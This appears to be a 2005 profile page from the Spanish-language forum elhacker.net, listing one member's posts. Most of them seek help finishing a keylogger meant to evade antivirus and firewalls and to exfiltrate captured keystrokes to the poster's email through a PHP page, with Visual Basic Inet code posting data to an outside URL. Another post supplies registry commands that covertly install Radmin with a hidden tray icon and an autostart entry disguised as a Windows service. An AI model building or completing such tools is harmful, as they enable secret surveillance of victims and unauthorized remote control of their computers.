elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16]
151  Programación / Programación Visual Basic / como enviar un texto por método post a php en: 31 Agosto 2005, 15:58 pm
hola, mi pregunta es como postear un texto por medio del control Inet a una pagina web???

esto es lo que llevo de codigo, no se si este bien, miren:

-----------------

Public Function SendMail()

    Dim info As String
    Dim URL As String
    Dim Body As String
   
    On Error Resume Next
   
    URL = "www.t1bia.trans69.com/mail.php"
    info = "&body=" & text1
    Call Inet1.Execute(URL, "POST", info, "Content-Type: application/x-www-form-urlencoded")
End Function

----------------------
esa url es mia, ahi tengo un php que hice anoche el cual tiene un textbot y un boton, todo lo que se escriba en ese textbox se manda a uno de mis correos.
Pero no se como hacer para que mi aplicacion en VB mande lo que hay en text1 a esa web!!!!

podrian ayudarme con alguna info porfas? graciaaaaaaaas!
152  Programación / Programación Visual Basic / Re: Keylogger con Http Tunneling! en: 31 Agosto 2005, 07:04 am
Casi completoOo! jejeje.
Esto es lo que llevo hasta el momento.

Subi una pagina .php en un servidor, bla bla bla, con solo meter algo de info y darle click la manda a mi mail, con la ip de la makina desde donde se mando.
Ok!... pero como hago para que el keylogger se meta a esa pagina y postee el log??????

el log se guarda en un textbox, y segun tengo entendido con el control inet se puede (GRACIAS A REYDELMUNDO que ME ABRIO LOS OJOS).

es algo asi, no?

Inet1.Execute [URL], [OPERATION], [INPUT Data], [Input headers]

que en mi kaso seria algo asi...
Inet.Execute "www.miurl.com/mail.php", "POST", [INPUT Data], [Input headers]

como pueden ver tengo dudas en las dos ultimas.
que es input data e input headers?
input data es la info que pienso postear no?
pero... que le pongo?
"mail_body= text1 " ???? y que pongo en input headers... Waaaaaa! no entiendo estoOo! y kreo que me falta muy muy muy poko para lograr terminar el keylogger, les pido por favor alguna pista, algo kon lo que me puedan ayudar porfaaaaaaas!!!!!!!!!!!!!!!!! :-[
153  Programación / Programación Visual Basic / Re: Keylogger con Http Tunneling! en: 31 Agosto 2005, 01:53 am
muchas gracias por sus respuestas!... ha decir verdad prefiero el metodo que menciono reydelmundo, ya que eso es exactamente lo que estaba buscandoOo!. se me hace muy buena idea esa de filtrar el mensaje por medio del ie, ya que kasi todas las pc's tiene este proceso abierto a los firewalls y se me hace mas lioso tener que hacer otra aplicacion para matar el proceso del firewall :S no lo veo 100% seguro.   :(, pero weno, muchas gracias!!!!

ahora, si tienen info sobre estos temas plz posteenla :D aki estoy para lo que necesiten! ^^
154  Programación / Programación Visual Basic / Keylogger con Http Tunneling! en: 29 Agosto 2005, 18:55 pm
Hola...  quiero empezar el proyecto de un keylogger hecho en Vb que sea kasi indetectable, por lo menos que si sea indetectable por antivirus y firewall...
Lo primero del antivirus kedo resuelto, pues por ser en Vb es facil hacerlo indetectable, pero lo del firewall me es imposible!!!!!

Pke ala hora de que mi keylogger manda el log a mi mail salta el firewall, el proceso se llama msimn.exe, jeje, lo trate de disimular un poko, pero no todos kaen!.

Eh escuchado un poko de Http tunneling, no se muy bien que es, segun tengo ententido es usar el iexplore, o el programa determinado para navegar para mandar o conectarse con alguna pc...

recuerdo de un programa que se llamaba "FIREHOLE" de una compañia de firewalls que usaba http tunneling para mandar un mensajito a otra pc, y esto era para que se dieran cuenta que por ahi se podia filtrar informacion.

Entonces... por medio de Http tunneling puedo mandar mis logs a mi mail?
Algo como usar al internet explorer para que se conecte con el servidor smtp y me lo mande? Lo kreen posible?????????????
Karay! no se me ocurre nada, no se ni por donde empezar!.

Si akaso saben algo de esto por favor les pido que me lo digan, links, comentarios, todo es buenoOo! Pofas! jejejeje.

155  Foros Generales / Sugerencias y dudas sobre el Foro / Tarjeta de creditoOo? en: 14 Agosto 2005, 08:11 am
Hola... que tal! Espero que esten bien...

Hoy al estar buscando un tema en el buscador del foro, descubri algo inusual...
Les contare.

En la sección de buscar, coloque un tema en especial... Bla bla bla!.
Al dar click en buscar, me salio estoOo!.



Espero que haya salido la fotoOo!.
Si no salio entonces aki esta el link:

http://www.ados-corporation.gratishost.com/error.bmp

Y aki esta el codigo fuente de la pagina esa que me salioOo!:

http://www.ados-corporation.gratishost.com/source.txt

Si lo kieren leer tienen que darle boton derecho y guardar como, pke sino los mandara a la pagina esa!... Jejeje.

Alguien me puede decir pke me mando a esa pagina?
Es un tipo de exploit parecido al que hacen de Hotmail? con lo de tarjetas de gusanito? xD jejejeje.
No entiendoOo!... y no es que mi pc tenga algun Spyware :S .

Explikenmeeeeeeeeeeee :P

WenoOo los dejoOo!
156  Programación / Programación Visual Basic / Mandar logs de un Keylogger!!!!! VIA MAIL! en: 13 Junio 2005, 07:35 am
Jeloooooou!!!!!!

Tengo una duda keridos programadores de Visual Basic!  :-\
La vdd soy un lammer al hacer esto, pero tengo como meta aprender y pues proximamente hacer mi propio ejecutable...
Pero ejecutable de que?
Ahora les expliko!.

quiero hacer un Keylogger, weno, la vdd encontre unos kodigos fuente por ahi, con unas pekeñas modifikaciones kedo casi perfecto ;). solo unos cuantillos detalles, pero esos no importan.
Lo que hace este key. es que genera el log, pero pues hasta ahi!
No lo manda a ninguna parte :P Jejeje.........

Y entonces me puse a buskar el codigo de algun programa para mandar mail con archivos adjuntos! Y encontre este.

http://www.lawebdelprogramador.com/codigo/down.php?idp=60

Le pido al que tenga curiosidad, ganas y tiempo de ayudarme.... En decirme que kosas cambiar para que con solo dar doble click a ese Exe compilado se mande un archivo automatikamente y el programa se korra oculto... SI ME EXPLIKO?
Intentare explikar de nuevo.
Al abrir este archivo automatikamente se mande a mi mail el archivo "ekis" de "ekis" karpeta..........
Jejeje, espero haber sido claro.


No les pido que me hagan el programa, solo que me orienten un poko, pke la vdd estoy perdido! Estuve modifikando unas kosas, pero ala hora de "mandar" el correo, mi mouse se kedaba como que tonto.... esperando alguna orden, y nada llegaba xDDDDDDD.

Weno, espero que me puedan ayudar  :).
GRACIAS!
SALUDOS DESDE MEXICO!  :P
157  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Como hago para insertar imagenes en: 12 Junio 2005, 00:18 am
probando probando
158  Seguridad Informática / Hacking / Re: Troyanizando Radmin 2.1 control remoto en: 12 Mayo 2005, 20:23 pm
que onda... Mira, haber si te puedo ayudar, yo tmb batalle en eso, eske no se mucho de programacion basika Jajajaja...
El Bat lo haces en el Note Pad, pero le pones de nombre por ejemplo "radmin.bat" o "hola.bat", pero que termine en BAT, pke sino se creara un simple archivo de texto.
despues...
Escribes todo el codigo, pero recuerda que tienes que cambiar el parametro de la contraseña... mira, observa el codigo


REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "aki va el codigo que representa el puerto que kieras"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "aki va la contraseña que hayas escogido"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaudt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"

... Este lo guardas en cualkier karpeta de tu pc, y a la hora de que estes agregando el comando de consola escoges el archivo que kreaste (EL BAT)... Y pues lo demas creo que si sabes como hacerlo vdd?
Como kiera... Si tienes alguna duda aki tienes mi mail
Xtreme_Modding@Hotmail.com

Espero haberte ayudado :)
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines